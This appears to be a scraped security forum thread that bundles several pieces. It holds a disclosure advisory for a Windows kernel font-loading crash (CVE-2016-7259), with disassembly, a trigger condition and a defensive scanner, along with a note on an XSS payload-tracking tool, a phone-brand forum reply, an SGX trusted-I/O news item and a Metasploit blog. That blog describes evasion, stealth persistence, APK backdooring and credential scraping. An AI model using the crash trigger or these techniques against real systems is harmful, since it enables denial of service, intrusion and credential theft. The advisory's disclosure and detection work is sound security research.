002ee75c 75e1b67c 75e1adfb 00a65558 000000d8 ntdll!KiFastSystemCallRet
002ee760 75e1adfb 00a65558 000000d8 00000002 GDI32!NtGdiAddFontResourceW+0xa
002ee7a0 75e4993b 002ee7d4 00000011 00000000 GDI32!GdiAddFontResourceW+0x5b
002ee9f8 01024b8b 00415b70 00000010 00000000 GDI32!AddFontResourceExA+0xeb
WARNING: Stack unwind information not available. Following frames may be wrong.
002ef4d0 01029314 002b02d4 0000003f 00322540 Test+0x84b8b
002ef7d0 0107763a 00000003 00322518 00322820 Test+0x89314
002ef81c 0107781d 002ef838 76074198 7fd66000 Test+0xd763a
002ef824 76074198 7fd66000 76074170 fa31b76d Test+0xd781d
002ef838 77bb2cb1 7fd66000 fa4bb319 00000000 KERNEL32!BaseThreadInitThunk+0x24
002ef880 77bb2c7f ffffffff 77bde751 00000000 ntdll!__RtlUserThreadStart+0x2b
002ef890 00000000 0100b103 7fd66000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb
FOLLOWUP_IP:
win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33
8e3c7280 f6411808        test    byte ptr [ecx+18h],8
SYMBOL_STACK_INDEX:  b
SYMBOL_NAME:  win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: win32k
IMAGE_NAME:  win32k.sys
DEBUG_FLR_IMAGE_TIMESTAMP:  577fb612
IMAGE_VERSION:  6.3.9600.18405
BUCKET_ID_FUNC_OFFSET:  ffffffffffffff33
FAILURE_BUCKET_ID:  0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts
BUCKET_ID:  0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts
PRIMARY_PROBLEM_CLASS:  0x1E_c0000005_R_win32k!PUBLIC_PFTOBJ::bLoadFonts
ANALYSIS_SOURCE:  KM
FAILURE_ID_HASH_STRING:  km:0x1e_c0000005_r_win32k!public_pftobj::bloadfonts
FAILURE_ID_HASH:  {de897383-506f-34a6-612f-9272467400a7}

Followup: MachineOwner
---------

Analysis

The faulting syscall is win32k!NtGdiAddFontResourceW.
According to the ReactOS source code, the function prototype is:

__kernel_entry INT W32KAPI APIENTRY NtGdiAddFontResourceW(
    _In_reads_(cwc) WCHAR *pwszFiles,
    _In_ ULONG cwc,
    _In_ ULONG cFiles,
    _In_ FLONG f,
    _In_ DWORD dwPidTid,
    _In_opt_ DESIGNVECTOR *pdv);

The crash happens on a NULL pointer dereference in the win32k!PUBLIC_PFTOBJ::bLoadFonts function:

1: kd> .trap 0xffffffffa8815974
ErrCode = 00000000
eax=00000000 ebx=00000000 ecx=00000000 edx=00c295b0 esi=9ee20398 edi=00000002
eip=8e3c7280 esp=a88159e8 ebp=a8815a4c iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffffff`ffffff33:
8e3c7280 f6411808        test    byte ptr [ecx+18h],8       ds:0023:00000018=??

The previous instruction is:

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A827D    mov     ecx, [esi+eax*4]    ; ecx = nullptr

The register configuration is as follows:
- The ESI register points to a kernel pool memory block.
- The EAX register is the index of the file passed to the syscall (win32k!NtGdiAddFontResourceW) in the 1st argument. Note: multiple file names can be passed to the syscall with the | separator character.
- EDI is the number of files passed in the 1st argument of the syscall.

The kernel pool memory block (where the null pointer lies) is allocated and has a size of 0x90 bytes:

1: kd> !pool @esi
Pool page 9ee20398 region is Paged session pool
 9ee20000 size:  338 previous size:    0  (Allocated)  Gfnt
 9ee20338 size:   10 previous size:  338  (Free)       Free
 9ee20348 size:   48 previous size:   10  (Allocated)  Ussm
*9ee20390 size:   90 previous size:   48  (Allocated) *Gffv
        Pooltag Gffv : Gdi FONTFILEVIEW
 9ee20420 size:   68 previous size:   90  (Allocated)  Usqm
 9ee20488 size:  288 previous size:   68  (Allocated)  Gla5
 9ee20710 size:  8f0 previous size:  288  (Allocated)  Gla1

The kernel pool memory block is allocated in the same function (win32k!PUBLIC_PFTOBJ::bLoadFonts):

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A8449    mov     ecx, edi            ; ecx = edi = number of files = 2
; [...]
.text:001A844F    mov     edx, 'vffG'         ; block tag
.text:001A8454    lea     eax, ds:7[edi*4]    ; lea eax,[edi*4+7] ; edi = 2 ; eax = 0x0f
.text:001A845B    shl     ecx, 6              ; before: ecx = 2; after: ecx = 0x80
.text:001A845E    and     eax, 0FFFFFFF8h     ; eax = 8
.text:001A8461    push    1
.text:001A8463    add     ecx, eax            ; NumberOfBytes: 0x80 + 8 = 0x88
.text:001A8465    mov     [esp+64h+var_28], eax
.text:001A8469    call    PALLOCMEM2(x,x,x)
.text:001A846E    mov     [esp+60h+pFontFileView], eax ; kernel pool block pointer

Then the win32k!vLoadFontFileView function is called:

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A8539    push    [esp+80h+pFontFileView] ; unsigned __int16 *
.text:001A853D    call    vLoadFontFileView

Inside win32k!vLoadFontFileView, both font files (*.pfm and *.pfb) are loaded and then mapped. The mapping occurs in the win32k!MapFontFiles function.

; in win32k!vLoadFontFileView
.text:0018D5BD    push    [ebp+arg_C]         ; 1: kd> dp 9efb2a90
.text:0018D5BD                                ; 9efb2a90 00000000 00000000 00000000 00000000
.text:0018D5C0    mov     edx, [ebp+arg_0]    ; 1: kd> dd 8d9f1108
.text:0018D5C0                                ; 8d9f1108 8d9f1110 8d9f1150 00000000 00000000
.text:0018D5C3    mov     ecx, ebx            ; ebx = ecx = 2 (number of files)
.text:0018D5C5    push    [ebp+arg_8]         ; points on P
.text:0018D5C8    call    MapFontFiles(ulong,_FONTFILEVIEW * *,void * *,ulong *)

The call stack on entry to win32k!MapFontFiles looks like this:

3: kd> k
 # ChildEBP RetAddr
00 8a4e7988 8e1805cd win32k!MapFontFiles
01 8a4e79bc 8e19b542 win32k!vLoadFontFileView+0x18a
02 8a4e7a4c 8e194bb8 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x1f5
03 8a4e7aac 8e194aee win32k!GreAddFontResourceWInternal+0xa3
04 8a4e7bf4 81574417 win32k!NtGdiAddFontResourceW+0xbc

Inside win32k!MapFontFiles there is a loop that maps both font files using the win32k!EngMapFontFileFDInternal function:

; in win32k!MapFontFiles
.text:001A1CAA    add     eax, ecx            ; 2nd -> eax = 9efb2a9c
.text:001A1CAC    mov     edx, ecx
.text:001A1CAE    push    0
.text:001A1CB0    push    eax
.text:001A1CB1    mov     eax, [ebp+var_4]
.text:001A1CB4    mov     ecx, [ecx+eax]
.text:001A1CB7    call    EngMapFontFileFDInternal(x,x,x,x)
.text:001A1CBC    test    eax, eax            ; eax = 0 on 2nd pass
.text:001A1CBE    jz      @@ErrorMapFontFile
.text:001A1CC4    mov     ecx, [ebp+arg_0]    ; 1: kd> dp 9efb2a90
.text:001A1CC4                                ; 9efb2a90 00b70000 00000000 000002f3 00000000
.text:001A1CC4                                ; 9efb2aa0 46140003 38616c47 010807fe 00000001
.text:001A1CC4                                ; 9efb2ab0 80000000 00000000 00008208 00000000
.text:001A1CC7    inc     edi
.text:001A1CC8    mov     eax, [ebp+var_C]    ; 8
.text:001A1CCB    add     ecx, 4
.text:001A1CCE    mov     [ebp+arg_0], ecx
.text:001A1CD1    cmp     edi, [ebp+number_of_files] ; 2
.text:001A1CD4    jb      short loc_1A1CAA    ; 2nd -> eax = 9efb2a9c

The first loop pass opens and maps the *.pfm font file, the second one the *.pfb file. In win32k!EngMapFontFileFDInternal there is a call to win32k!bCreateSection:

; in win32k!EngMapFontFileFDInternal
.text:00142AB9    mov     ecx, [ebx+28h]      ; du poi(@ebx + 28)
.text:00142AB9                                ; 8da41000 "\??\C:\WORK\FONTS\TEST\FONTS\LIB"
.text:00142AB9                                ; 8da41040 "TEST63.PFB"
.text:00142AB9                                ;
.text:00142ABC    shr     eax, 3
.text:00142ABF    and     al, 1
.text:00142AC1    movzx   eax, al
.text:00142AC4    push    eax                 ; int (0)
.text:00142AC5    lea     eax, [esp+74h+var_5C]
.text:00142AC9    push    eax                 ; struct _FILEVIEW *
.text:00142ACA    push    esi                 ; unsigned __int16 * (0)
.text:00142ACB    call    bCreateSection(ushort *,_FILEVIEW *,int,int *,uchar)

Inside win32k!bCreateSection, the code uses nt!IoCreateFile. Here (after the call to open the file), the resulting handle refers to the *.pfb file:

!handle 80000bf8
PROCESS 9dcd2040  SessionId: 1  Cid: 0af0    Peb: 7f58c000  ParentCid: 0e58
    DirBase: 00e08540  ObjectTable: af8583c0  HandleCount: <Data Not Accessible>
    Image: FontLoader.exe

Kernel handle Error reading handle count.
80000bf8: Object: ab226d70  GrantedAccess: 001200a9 Entry: a47827f0
Object: ab226d70  Type: (8023c868) File
    ObjectHeader: ab226d58 (new version)
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \Work\fonts\test\fonts\Test-Italic63.pfb {HarddiskVolume2}

The code then uses nt!ZwQueryInformationFile to query file information. Note that the code doesn't check whether the file size is 0.

; in win32k!bCreateSection
.text:000DC47B    lea     eax, [ebp+FileInformation]
.text:000DC47E    push    5                   ; FileInformationClass
.text:000DC480    push    18h                 ; Length
.text:000DC482    push    eax                 ; FileInformation
.text:000DC483    lea     eax, [ebp+IoStatusBlock]
.text:000DC486    push    eax                 ; IoStatusBlock
.text:000DC487    push    [ebp+FileHandle]    ; FileHandle
.text:000DC48A    call    edi                 ; ZwQueryInformationFile(x,x,x,x,x)

The code then calls win32k!ZwWin32CreateSection, which is merely a wrapper around nt!ZwCreateSection:

; in win32k!bCreateSection
.text:000DC548    mov     [ebp+ObjectAttributes.Length], 18h
.text:000DC552    mov     [ebp+ObjectAttributes.RootDirectory], ebx
.text:000DC558    mov     [ebp+ObjectAttributes.Attributes], 200h
.text:000DC562    mov     [ebp+ObjectAttributes.ObjectName], ebx
.text:000DC568    mov     [ebp+ObjectAttributes.SecurityDescriptor], ebx
.text:000DC56E    mov     [ebp+ObjectAttributes.SecurityQualityOfService], ebx
.text:000DC574    test    cl, 2
.text:000DC577    jnz     loc_21098C
.text:000DC57D    push    ecx                 ; int
.text:000DC57E    push    ecx                 ; int
.text:000DC57F    push    [ebp+FileHandle]    ; FileHandle
.text:000DC582    neg     esi
.text:000DC584    lea     eax, [ebp+MaximumSize]
.text:000DC587    push    ecx                 ; int
.text:000DC588    sbb     esi, esi
.text:000DC58A    lea     ecx, [ebp+var_60]   ; int
.text:000DC58D    and     esi, 0FFFFFFE4h
.text:000DC590    add     esi, 20h
.text:000DC593    push    esi                 ; SectionPageProtection
.text:000DC594    push    eax                 ; MaximumSize
.text:000DC595    lea     eax, [ebp+ObjectAttributes]
.text:000DC59B    push    eax                 ; ObjectAttributes
.text:000DC59C    call    ZwWin32CreateSection(x,x,x,x,x,x,x,x,x) ; fail inside!!!
.text:000DC5A1    test    eax, eax            ; HRESULT indicates error
.text:000DC5A3    js      loc_21091E          ; take jcc

The code can't create a section for an empty file, which results in an error code. The file handle is then closed and an error is signaled by zeroing the eax register:

; in win32k!bCreateSection
.text:0021091E    push    [ebp+FileHandle]    ; Handle
.text:00210921    call    ds:ZwClose(x)
.text:00210927
.text:00210927 loc_210927:
.text:00210927    xor     eax, eax            ; function returns 0
.text:00210929    jmp     loc_DC613           ; go to function epilogue

The 0 return value is still seen as an error by the caller (win32k!EngMapFontFileFDInternal), which also exits:

; in win32k!EngMapFontFileFDInternal
.text:00142ACB    call    bCreateSection(ushort *,_FILEVIEW *,int,int *,uchar)
.text:00142AD0    mov     [esp+70h+ret_val], eax
; [...]
.text:00142AE4    mov     eax, [esp+70h+ret_val]
.text:00142AE8
.text:00142AE8 loc_142AE8:
.text:00142AE8    test    eax, eax
.text:00142AEA    jz      loc_142B77          ; to function epilogue

Back in win32k!MapFontFiles, at the call site of win32k!EngMapFontFileFDInternal, we can see that a 0 return value is also taken as an error. The file is then unmapped and the first pointer-sized value in the font file view (pointed to by the esi register) is also zeroed. This value corresponds to the file mapping.

; in win32k!MapFontFiles
.text:001A1CB7    call    EngMapFontFileFDInternal(x,x,x,x)
.text:001A1CBC    test    eax, eax            ; eax = 0 on 2nd pass
.text:001A1CBE    jz      @@ErrorMapFontFile
; [...]
.text:00230C89 @@ErrorMapFontFile:
.text:00230C89    test    edi, edi
.text:00230C8B    jz      short loc_230CAC
.text:00230C8D    sub     ebx, esi
.text:00230C8F    sub     [ebp+arg_4], esi
.text:00230C92
.text:00230C92 loc_230C92:
.text:00230C92    push    dword ptr [esi]
.text:00230C94    call    EngUnmapFontFileFD(x) ; unmap file
.text:00230C99    mov     eax, [ebp+arg_4]
.text:00230C9C    xor     ecx, ecx
.text:00230C9E    mov     [esi], ecx          ; esi=pFontFileView ; ecx = 0
.text:00230CAC
.text:00230CAC loc_230CAC:
.text:00230CAC    xor     al, al              ; exits with 0

The function then exits (with a zero value, indicating an error) and we are back in win32k!vLoadFontFileView. Inside this function the return code is checked and win32k!vLoadFontFileView also exits, but the error code is not propagated to the caller (PUBLIC_PFTOBJ::bLoadFonts).

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A853D    call    vLoadFontFileView
.text:001A8542    mov     eax, [esp+60h+p_minus_pfontfileview] ; eax = [a5861a34]=00000000
.text:001A8542                                ; --------------------------
.text:001A8542                                ; font file view first DWORD has been zeroed!
.text:001A8542                                ; 3: kd> dp 9e417dd8 L1
.text:001A8542                                ; 9e417dd8  00000000
; [...]
.text:001A8570
.text:001A8570 loc_1A8570:
.text:001A8570    cmp     [esp+60h+var_ghsemPublicPFT], 0 ; [a5861a18]=00000000
.text:001A8575    jz      loc_1A86FF          ; clean up

The file is unmapped once again, but the pointer is 0:

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A8710    push    dword ptr [ebx+esi*4] ; 0 !!!
.text:001A8713    call    EngUnmapFontFileFD(x)

Then the font file view is used again, but as the pointer is 0 the code tries to dereference the NULL address:

; in win32k!PUBLIC_PFTOBJ::bLoadFonts
.text:001A8279    mov     esi, [esp+60h+pFontFileView]
.text:001A8279                                ; note: first dword is 0
.text:001A8279                                ; 1: kd> dp 9e417dd8 L4
.text:001A8279                                ; 9e417dd8  00000000 9e417e20 1471fe00 01d13591
.text:001A827D
.text:001A827D loc_1A827D:
.text:001A827D    mov     ecx, [esi+eax*4]    ; ecx is a NULL pointer
.text:001A8280    test    byte ptr [ecx+18h], 8 ; crash here!!!
Version Information

Windows version - Windows 8.1 Update 1 x86 [up to date on 2016-08-25]:

    3: kd> vertarget
    Windows 8.1 Kernel Version 9600 MP (4 procs) Free x86 compatible
    Product: WinNt, suite: TerminalServer SingleUserTS
    Built by: 9600.18379.x86fre.winblue_ltsb.160614-0600
    Machine Name:
    Kernel base = 0x8160b000 PsLoadedModuleList = 0x81805618
    Debug session time: Thu Aug 25 16:03:28.779 2016 (UTC + 2:00)
    System Uptime: 0 days 0:12:29.534

Win32k.sys module information:

    3: kd> lm vm win32k
    start    end      module name
    8e234000 8e59b000 win32k (pdb symbols) g:\symbols\win32k.pdb\ACF8092B8851410DBBB1D0C026BFCCAE2\win32k.pdb
        Loaded symbol image file: win32k.sys
        Image path: \SystemRoot\System32\win32k.sys
        Image name: win32k.sys
        Timestamp: Fri Jul 08 16:17:54 2016 (577FB612)
        CheckSum: 003599F0
        ImageSize: 00367000
        File version: 6.3.9600.18405
        Product version: 6.3.9600.18405
        File flags: 0 (Mask 3F)
        File OS: 40004 NT Win32
        File type: 3.7 Driver
        File date: 00000000.00000000
        Translations: 0409.04b0
        CompanyName: Microsoft Corporation
        ProductName: Microsoft Windows Operating System
        InternalName: win32k.sys
        OriginalFilename: win32k.sys
        ProductVersion: 6.3.9600.18405
        FileVersion: 6.3.9600.18405 (winblue_ltsb.160708-0600)
        FileDescription: Multi-User Win32 Driver
        LegalCopyright: Microsoft Corporation. All rights reserved.

Detection

The format of the font file itself is not at issue. Check every PostScript Type 1 font metrics file (*.pfm) together with its associated *.pfb outline file: if the *.pfb file is empty (0 bytes), the crash can occur.

Mitigation

NULL page protection on newer Windows versions mitigates this problem, since the page at address 0 can no longer be allocated.
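The detection rule above (a *.pfm metrics file whose companion *.pfb outline file is 0 bytes) can be turned into a simple directory scan. The script below is an added example written for this page; it is not from the original advisory and not Quarkslab's or Microsoft's code. The font directory it builds, the file names and sizes in it, and the helper names are constructed for illustration only.

```python
"""Flag PostScript Type 1 fonts whose .pfb outline file is empty.

Added example, not part of the original advisory. It applies the rule
stated in the Detection section: a *.pfm metrics file paired with a
0-byte *.pfb file is the input that triggered the crash described above.
Directory layout, file names and sizes below are constructed for the demo.
"""
import os
import tempfile


def find_empty_pfb(sizes):
    """Return the names of .pfb files that are empty AND paired with a .pfm.

    `sizes` maps a file name to its size in bytes, as a scan of a single
    directory would produce. Stem and extension are matched
    case-insensitively, because Windows file names are.
    """
    by_stem = {}
    for name, size in sizes.items():
        stem, ext = os.path.splitext(name)
        by_stem.setdefault(stem.lower(), {})[ext.lower()] = (name, size)

    flagged = []
    for stem in sorted(by_stem):
        files = by_stem[stem]
        if ".pfm" not in files or ".pfb" not in files:
            continue  # unpaired files are not the case the advisory describes
        pfb_name, pfb_size = files[".pfb"]
        if pfb_size == 0:
            flagged.append(pfb_name)
    return flagged


def scan_directory(path):
    """Collect sizes of regular files in `path` (non-recursive), then check them."""
    sizes = {}
    for entry in os.scandir(path):
        if entry.is_file(follow_symlinks=False):
            sizes[entry.name] = entry.stat().st_size
    return find_empty_pfb(sizes)


def demo():
    """Build a constructed font directory and return what the scan flags."""
    with tempfile.TemporaryDirectory() as fontdir:
        layout = {
            "GOOD____.PFM": 640, "GOOD____.PFB": 30000,  # healthy pair
            "empty___.pfm": 640, "empty___.pfb": 0,      # the crashing case
            "orphan__.pfm": 640,                          # metrics without outline
            "README.txt": 0,                              # unrelated empty file
        }
        for name, size in layout.items():
            with open(os.path.join(fontdir, name), "wb") as f:
                f.write(b"\0" * size)
        return scan_directory(fontdir)


if __name__ == "__main__":
    for pfb in demo():
        print("empty Type 1 outline file:", pfb)
```

Run it against a real font directory with `scan_directory(r"C:\Windows\Fonts")`; only a .pfb that is both empty and paired with a .pfm is reported, so an unrelated 0-byte file or a metrics file with no outline at all is left alone.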
CVE Number

MITRE: CVE-2016-7259
Microsoft: Microsoft Security Bulletin MS16-151

Time Line

2015-12-xx: [QB] Vulnerability found; pushed for later thorough analysis
2016-08-25: [QB] Vulnerability unstacked and analyzed
2016-08-26: [QB] Vulnerability reported to Microsoft
2016-08-26: [MS] Microsoft acknowledges receipt
2016-09-15: [MS] Microsoft has a successful repro
2016-11-02: [QB] Ask whether they deemed the bug important or not
2016-11-10: [MS] Acknowledge the fix will be released in the December Patch Tuesday
2016-12-13: [MS] Fix for CVE-2016-7259 is released
2016-12-14: [QB] Quick look at the patch and blog release

Sursa: http://blog.quarkslab.com/cve-2016-7259-an-empty-file-into-the-blue.html
-
Sleepy Puppy

What is Sleepy Puppy?

Sleepy Puppy is a cross-site scripting (XSS) payload management framework which simplifies the ability to capture, manage, and track XSS propagation over long periods of time.

Why Should I use Sleepy Puppy?

When testing for client-side injections (HTML/JS/etc.), security engineers often look only for where the injection occurs within the application they are testing. While this provides ample coverage for the application in scope, the code the engineers are injecting may be reflected back in a completely separate application. Sleepy Puppy helps facilitate inter-application XSS testing by providing JavaScript payloads that call back to the Sleepy Puppy application. This allows tracking when and where a payload fires even if the execution is triggered by a different user, occurs in a different application, or happens long after the initial test was performed. These payloads and the "PuppyScripts" (which are often JavaScript) that define them are completely customizable, allowing you to capture only the information you need depending on your environment.

Sursa: https://github.com/Netflix/sleepy-puppy
-
I'm glad to see there are people more passionate about this field than I am. But "there are good Chinese brands" is, like mine, an opinion, only a contradictory one.

1. It's not that relevant that they're "made in China". iOS is not made in China (as far as I know). Also, the iPhone and other self-respecting phones will never install backdoors or software that steals everything it can from a phone (https://thehackernews.com/2016/11/hacking-android-smartphone.html) because they have a brand they want to maintain. I don't know about you, but I don't want my data ending up in China.

2. The remark about AllView was based on tests I did myself on about 2 AllView phones. I was satisfied.

3. Not everyone wants to buy a phone and change its ROM. Are your parents passionate about rooting phones? Then yes, I understand. Also, I tested Cyanogen back from the older versions and it wasn't exactly stable. I mean, come on, I get a phone, install Cyanogen because it's cool, and the Camera and the messaging app don't work. After all, who needs those as long as I no longer have bloatware?

4. If you are happy with a Chinese knock-off, that doesn't mean we have to be too.

PS: Shame on you. Don't throw accusations around just because someone doesn't share your opinions.
-
Researchers work to save trusted computing apps from keyloggers
SGX needs I/O protection, Austrian boffins reckon
5 Jan 2017 at 06:35, Richard Chirgwin

Intel's Software Guard Extensions started shipping in Skylake processors in October 2015, but it has an Achilles heel: insecure I/O such as keyboards or USB provides a vector by which sensitive user data could be compromised.

A couple of boffins from Austria's Graz University of Technology reckon they've cracked that problem, with an add-on that creates protected I/O paths on top of SGX.

Instead of the handful of I/O technologies directly protected by SGX (most of which have to do with DRM rather than user security), the technology proposed in Samuel Weiser and Mario Werner's arXiv paper, SGXIO, is a "generic" trusted I/O that can be applied to keyboards, USB devices, screens and so on.

And we're not talking about a merely esoteric technology that might soothe the fears of people running cloud apps on multi-tenant infrastructure. The Weiser/Werner proposal would create an SGX-supported trusted path all the way to a remote user's browser to protect (for example) an online banking session, and provide "attestation mechanisms to enable the bank as well as the user to verify that trusted paths are established and functional."

SGXIO as a way to protect a banking app

The shortcoming SGXIO is trying to fix is that SGX's threat model considers everything outside itself a threat (which isn't a bad thing, in context). The usual approach for trusted paths is to use encrypted interfaces. The paper mentions the Protected Audio Video Path (PAVP), but that's a DRM-specific example, and most I/O devices don't encrypt anything.

Hence SGXIO, an attempt to add a generic trusted path to the SGX environment. With that trusted path reaching to the end user environment, it's an attempt to protect an application from nasties like keyloggers that a miscreant might have installed on a victim's box.
The key architectural concepts in SGXIO are:

- A trusted stack, which contains a security hypervisor, secure I/O drivers, and the trusted boot (TB) enclave; and
- The virtual machine, hosting an untrusted operating system that runs secure user applications.

A user application communicating with the end user:

1. Opens an encrypted channel to the secure I/O driver;
2. This tunnels through the untrusted operating system and establishes secure communication with the "generic" user I/O device.

The hypervisor binds user devices exclusively to the secure I/O drivers; I/O on unprotected devices passes directly through the hypervisor; the trusted path names both the encrypted user-app-to-driver communication and the exclusive driver-to-device binding. The TB enclave provides assurance of the trusted path setup by attesting the hypervisor.

The paper illustrates this process like this:

SGXIO's trusted stack components

An implementation wouldn't be seamless: the SGXIO paper devotes a fair chunk of copy to application design, enclave programming (fortunately something Intel provides resources for), driver design, and hypervisor choice. Application developers, for example, have to work out a key exchange mechanism (Diffie-Hellman is supported, and SGXIO offers its own lightweight key protocol). For hypervisors, the paper suggests the seL4 microkernel. Originally developed by Australia's NICTA and now handled by the CSIRO Data61 project, seL4 is a mathematically verified software kernel that was published as open source software in 2014.

SGXIO will get its first public airing at the CODASPY'17 conference in March, being held in Scottsdale, Arizona. ®

Sursa: http://www.theregister.co.uk/2017/01/05/researchers_work_to_save_trusted_computing_apps_from_keyloggers/
-
12 Days of HaXmas: Meterpreter's new Shiny for 2016
Blog Post created by Brent Cook on Jan 5, 2017

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the "gifts" we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit Framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager.

On the second day of Haxmas, Tim gave us two Android Services

Exploiting mobile devices is exciting, but a mobile session does not have the same level of connectivity as an always-on server session does. It is easy to lose your session because the phone went to sleep, there was a loss of network connectivity, or the payload was swapped out for some other process.
While we can't do much about networking, we did take care of the process swapping by adding the ability for Android Meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's Python Responder or just a web server, you can now set up a locally running service via a Meterpreter session that is visible to your target users. This is a nice complement to the standard port forwarding that has been available with Meterpreter sessions for some time.

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'. Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your choosing.

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to administrators and to penetration test/red teams. While it adds a powerful amount of capabilities, it is difficult to run Powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system. This is where the Powershell Extension for Meterpreter comes in.
It not only makes it possible to comfortably run Powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from Powershell. It uses the capabilities built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter Powershell extension in 2017.

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But getting data from applications can be trickier. However, many Android applications use SQLite for data storage, and armed with a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

On the eighth day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can save scarce bandwidth in mobile environments.
APK injection means you can now add Meterpreter as a payload to existing Android applications, even re-signing them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. On OS X, reliability is greatly improved by avoiding some of the more fragile OS X Python extensions that can cause the Python interpreter to crash.

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more: the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpreters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM mainframe? Mettle works there too! OS X, FreeBSD, OpenBSD? Well, it works there as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard?
Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealthy operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in mimikatz itself. Many thanks to gentilkiwi and OJ for the Christmas present.

Hope your 2017 is bright, and look forward to many more gifts this coming year from the Metasploit payloads team!

Sursa: https://community.rapid7.com/community/metasploit/blog/2017/01/03/12-days-of-haxmas-meterpreters-new-shiny-for-2016
-
-